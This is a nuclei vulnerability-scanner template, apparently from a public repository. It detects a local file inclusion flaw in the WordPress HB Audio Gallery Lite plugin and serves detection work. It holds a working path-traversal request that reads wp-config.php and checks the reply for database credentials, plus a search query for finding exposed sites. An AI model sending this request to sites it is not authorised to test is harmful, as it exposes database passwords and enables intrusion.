nuclei-templates/vulnerabilities/wordpress/hb-audio-lfi.yaml

37 lines
1017 B
YAML

id: hb-audio-lfi
info:
name: Wordpress HB Audio Gallery Lite - Local File Inclusion
author: dhiyaneshDK
severity: high
description: Wordpress HB Audio Gallery Lite is vulnerable to local file inclusion.
reference:
- https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html
metadata:
google-query: inurl:/wp-content/plugins/hb-audio-gallery-lite
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: wp,packetstorm,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/08/05